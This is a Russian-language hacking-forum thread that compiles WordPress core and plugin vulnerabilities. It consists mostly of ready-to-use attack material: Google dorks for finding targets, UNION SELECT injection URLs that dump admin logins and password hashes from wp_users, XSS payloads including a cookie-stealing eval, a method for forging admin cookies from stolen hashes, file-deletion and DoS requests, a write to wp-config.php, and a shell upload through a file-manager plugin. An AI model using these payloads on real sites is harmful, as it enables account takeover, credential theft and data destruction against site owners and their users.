![]() |
[ Обзор уязвимостей WordPress ]
Vulnerabilities:
Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub) Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability 1.4* Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability 1.5.1.* Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit WordPress <= 1.5.1.1 SQL Injection Exploit WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit 2.0.* WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit 2.1.* Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit 2.* Wordpress <= 2.x dictionnary & Bruteforce attack WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit dork: Код:
"is proudly powered by WordPress"Full path disclosure: WordPress < 1.5.2 Cross-site Scripting: /wp-login.php?action=login&redirect_to=[XSS] /wp-admin/templates.php?file=[XSS] /wp-admin/post.php?content=[XSS] http://www.example.com/wp-admin/edit-comments.php?s=[XSS] http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS] http://www.example.com/wp-admin/templates.php?file=[XSS] http://www.example.com/wp-admin/link-add.php?linkurl=[XSS] http://www.example.com/wp-admin/link-add.php?name=[XSS] http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit http://www.example.com/wp-admin/link-manager.php?order_by=[XSS] http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS] http://www.example.com/wp-admin/post.php?content=[XSS] http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS] SQL injection examples: http://www.example.com/index.php?m=[SQL] http://www.example.com/wp-admin/edit.php?m=[SQL] http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1 Tables/Prefix_/Columns: wp_ Hash algorithms: md5(password) WordPress Vulnerability Scanner Код:
$ perl -x wp-scanner.pl http://testblog/wordpress/ |
WordPress Scanner v1.3b BETA
http://blogsecurity.net/cgi-bin/wp-scanner.cgi
http://blogsecurity.net/projects/wp-scanner.zip |
WordPress <=2.0.4 XSS
simple PoC:
Код HTML:
<html>Код HTML:
<html>(we prove we can inject ANY JS): Код HTML:
<html> |
07 июня, 2007
Программа: WordPress 2.2, возможно более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST Вот пример запроса Код HTML:
<methodCall> |
Wordpress 2.2 Username Enumeration
PHP код:
|
WordPress Security Whitepaper
Цитата:
&& Writing Secure WordPress Plugins http://michaeldaw.org/papers/securing_wp_plugins/ |
WordPress PHP_Self Cross-Site Scripting Vulnerability
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"Код:
/wp-admin/plugins.php?page=akismet-key-configКод:
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>" |
Wordpress Plugin Scanner
|
Перебор паролей для версии Wordpress 2.x на Python тут.
|
runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0 WP <2.3 http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script> WordPress 2.0.1 Remote DoS Exploit Код:
#!perl |
Раскрытие Пути
Код:
http://[target]/[path]/wp-content/plugins/akismet/akismet.php |
|
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Код:
#Author: S.W.A.T.Mirror: http://www.milw0rm.com/exploits/4593 |
Sql Injection in wordpress 2.3.1
Sql Injection in wordpress 2.3.1
Код:
Author : Beenu AroraКод:
http://www.securityfocus.com/archive/1/484608 |
|
WordPress Charset SQL Injection Vulnerability
WordPress Charset SQL Injection Vulnerability
Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection. ( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html ) Exploit: http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23 _http://ilia.ws/archives/103-mysql_real_escape_string- versus-Prepared-Statements.html Код:
-----BEGIN PGP SIGNED MESSAGE----- |
Wordpress 2.3.1 - Broken Access Control is_admin()
Получение админских привелегий в обход пароля.
Как юзать: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63 Код:
By Michael Brooks |
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
Код:
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability |
XSS in WP-ContactForm <= 2.0.7
For attacking admin only (at options page):
1 Код HTML:
<html>Код HTML:
<html>Код HTML:
<html>Код HTML:
<html>For attacking every user of the site (at contact page): 5 Код HTML:
<html>Код HTML:
<html>For attacking every user of the site at contact page (and admin at options page): 6 Код HTML:
<html>Код HTML:
<html>For attacking every user of the site (at contact page): 8 Код HTML:
<html>Код HTML:
<html>Код HTML:
<html>Код HTML:
<html> |
directory traversal vulnerabilities in WP 2.0.11(win only)
PHP код:
Код:
Proof of concept: |
Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
Файловый менеджер находится тут: Код:
http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.phpКод:
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)Код:
plugins/wp-filemanager/ |
Код:
/wp-admin/index.php?page=\..\..\file.php |
WordPress <=2.3.1 Cookies Manipulation - Вход по md5() хешу пароля в куках
Вход по md5() хешу пароля в куках
Программа: WordPress 2.3.1 и более ранние версии Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности. Уязвимость существует из-за того, что злоумышленник может создать два аутентификационных файла куки ("wordpressuser_*" и "wordpresspass_*") из данных в таблице "users" и получить административный доступ к приложения. Для успешной эксплуатации уязвимости злоумышленнику требуется получить доступ на чтение таблицы "users" в базе данных. описание и сайт http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt ================================== PHP код:
wp_options -siteurl Тоесть при SQL-инъекции желательно вытащить и ее тоже: (select siteurl from wp_options) Иногда один вордпресс используется для разных доменных имен. Тогда вместо $siteurl берется $host, фактически равное URL-пути до блога, например: http://wordpress.com/blog без слеша на конце. NEW! Дополнение. Раскрытие COOKIEHASH. Необязательно вообще добывать siteurl, кодировать его в мд5 и проверять. Достаточно послать пост-пакет на wp-pass.php или на wp-login.php В ответе вам вернется валидный COOKIEHASH кукиса. [-1-] /wp-login.php?action=logout [-2-] wp-pass.php Код:
POST /wordpress/wp-pass.php HTTP/1.0 |
Files locations
Код:
blogscout |
Democracy 2.0.1 HTML Injection Vulnerability
Код:
http://wordpress.dom/blah’style=xss:expression(alert(document.cookie)); (Tested on IE7)PHP код:
|
WP TextLinkAds Plugin SQL Injection Vulnerability
Код:
http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id=’/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23PHP код:
|
WordPress<=2.0.3 Arbitrary file deletion
Только на Windows: Код HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..WordPress<=2.0.3 DoS: Код HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.phpКод HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..Код HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.XSS: wp-cat2tag converter: Код HTML:
http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script> |
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Код:
remote sql injection exploit |
XSS in plugin wp-slimstat 0.92 para Wordpress
PoC directamente: Код:
http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slКод:
# Wordpress 2.3 0day exploit – http://xssworm.com |
Full path disclosure:
Код:
/wp-admin/theme-editor.php?page= |
===================== Изменения в версиях для общего ознакомления: _http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path= tags%2F2.3.2&new=6528 _http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=pri ority ===================== Описание: Перебор логина/пароля в обход логирования. Возможность определение логина, перебора пароля через куки(wp-login.php), базик-авторизацию(wp-app.php). PHP код:
Описание: Раскрытие COOKIEHASH. Иногда бывают траблы с формированием куков для эксплоита. Обычно это происходит, если блог работает на несколько доменов/субдоменов сразу. "siteurl" добытый из базы не подходит. В хидере нас вернется пустой кукис с префиксом. /wp-login.php?action=logout /wp-pass.php ===================== Описание: Права админа: Запись в wp-config.php Отстутствие проверки имени файла при записи. Читать в wp-config.php нельзя. Но при записи забыли поставить проверку. Можно указать свой удаленный сервер и поадминить блог через свою бд. Читать нельзя: /wp-admin/templates.php?file=wp-config.php Но можно писать: /wp-admin/templates.php POST: newcontent=<?php;phpinfo();?>&action=update&file=w p-config.php ===================== Описание: Passive XSS $_POST['pages-sortby'] Права: админ Примеры уязвимого кода: /wp-admin/widgets.php PHP код:
Описание: Хранение пароля и логина админа к мылу в открытом виде в бд, отображение в админке. /wp-admin/options-writing.php wp_options -mailserver_login -mailserver_pass ===================== Описание: При импорте блога, если присутствуют посты без автора(анонимы), создается юзверь с дефолтными настройками. Тоесть возможно существование учеток с дефолтным паролем "password". Примеры уязвимого кода: /wp-admin/import/greymatter.php PHP код:
===================== |
# Author : Houssamix From H-T Team
# Script : Wordpress Plugin fGallery 2.4.1 # Download : http://www.fahlstad.se/wp-plugins/fgallery/ # BUG : Remote SQL Injection Vulnerability # Dork : inurl:/wp-content/plugins/fgallery/ ## Vulnerable CODE : ~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~ PHP код:
# Exploit : [Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users-- Example Цитата:
# Script : Wordpress Plugin WP-Cal # Download : http://www.fahlstad.se/wp-plugins/wp-cal/ # BUG : Remote SQL Injection Vulnerability # Dorks : inurl:/wp-content/plugins/wp-cal/ inurl:/WP-Cal/ ## Vulnerable CODE : ~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~ PHP код:
# Exploit : /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users-- example : Цитата:
|
Wordpress Plugin wp-adserve (adclick.php) SQL Injection
SQL Injection: Код:
http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_usersКод:
allinurl: "wp-adserve"Wordpress Plugin WassUp 1.4.1 Remote SQL Injection SQL Injection: Код:
http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_usersКод:
allinurl: "plugins/wassup" |
Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities
PoC: http://milw0rm.com/exploits/5035 Wordpress Plugin Wordspew Remote SQL Injection Vulnerability PoC: http://milw0rm.com/exploits/5039 |
Wordpress Pluging wp-footnotes 2.2
Multiple XSS Код:
http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot |
Wordpress Plugin st_newsletter Remote SQL Injection
SQL Injection Код:
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_usersКод:
allinurl :"wp-content/plugins/st_newsletter" |
Wordpress MU < 1.3.2 active_plugins option Code Execution
Exploit: PHP код:
|
Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
example Код:
http://xxxxx/forums?forum=xxxx&topic= (expliot)EXPLOİT 1 : Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*EXPLOİT 2 : Код:
SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)example Код:
www.xxxxx/forums?forum=1(expliot)example : Код:
http://www.xxx.com/sf-forum?forum=[exploit]Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*Код:
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/* |
Wordpress Photo album Remote SQL Injection Vulnerability
EXAMPLE Цитата:
Цитата:
Цитата:
|
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities
RFI
Register Globals: ON PoC: Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.Register Globals: ON PoC: Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.phpКод:
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?pageRegister Globals: ON PoC: Код:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text= |
| Время: 12:10 |